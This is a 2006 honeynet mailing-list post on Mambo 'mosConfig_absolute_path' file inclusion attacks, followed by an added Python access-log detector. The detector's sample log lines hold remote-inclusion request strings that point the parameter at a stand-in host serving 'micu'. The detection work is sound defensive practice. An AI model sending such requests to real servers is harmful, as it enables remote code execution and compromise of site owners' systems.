WebApp Sec: Mambo File Inclusion Attacks

Mambo File Inclusion Attacks

From: Mark Ryan del Moral Talabis <talabis_at_gmail.com>
Date: Sun, 15 Jan 2006 20:23:15 +0800

We have been receiving multiple attacks directed towards the popular
open source portal and content management system, Mambo. The attacks
make use of the "mosConfig_absolute_path" file inclusion
vulnerability of certain unpatched versions of the said application.
In this case, a possibly malicious file called "micu" is downloaded in
the process of the attack.

Full analysis:
http://www.philippinehoneynet.org/data.php

Ryan Talabis
Lead Analyst
Philippine Honeynet Project
http://www.philippinehoneynet.org

Received on Jan 15 2006
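
A log check for the request pattern the post describes, as an added example that is not part of the original message or the Philippine Honeynet Project's analysis: it flags web access-log entries in which the `mosConfig_absolute_path` parameter carries a remote URL instead of a local path. The log format (Apache/NCSA style), client addresses, hostnames and request paths below are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Client address and request target from an Apache/NCSA-style access-log line
# (assumed format; adjust the pattern to the server's actual LogFormat).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*"'
)
PARAM = "mosConfig_absolute_path"
# A legitimate value is a local filesystem path; a URL scheme means the
# application is being pointed at a remote file.
REMOTE_RE = re.compile(r"^\s*(?:https?|ftp)://", re.IGNORECASE)


def find_remote_includes(lines):
    """Return (client_ip, value) for every request that sets
    mosConfig_absolute_path to a remote URL."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parsable access-log entry
        query = urlsplit(m.group("target")).query
        # parse_qsl percent-decodes names and values, so an encoded
        # "http%3A%2F%2F..." is compared in its decoded form.
        for key, value in parse_qsl(query, keep_blank_values=True):
            if key == PARAM and REMOTE_RE.match(value):
                hits.append((m.group("ip"), value))
    return hits


# Constructed sample entries (documentation address ranges, example hostname).
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Jan/2006:10:01:02 +0800] "GET /index.php?option=com_content&task=view&id=1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [15/Jan/2006:10:03:44 +0800] "GET /index.php?option=com_content&mosConfig_absolute_path=http://remote.example/micu HTTP/1.0" 200 812',
    '198.51.100.7 - - [15/Jan/2006:10:03:51 +0800] "GET /index.php?mosConfig_absolute_path=http%3A%2F%2Fremote.example%2Fmicu HTTP/1.0" 200 812',
    '192.0.2.33 - - [15/Jan/2006:10:05:00 +0800] "GET /index.php?mosConfig_absolute_path=/var/www/mambo HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for ip, url in find_remote_includes(SAMPLE_LOG):
        print(f"{ip} set {PARAM} to remote URL {url}")
```

A hit only shows that the request was made; whether it succeeded depends on the Mambo version and PHP configuration of the server that received it.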
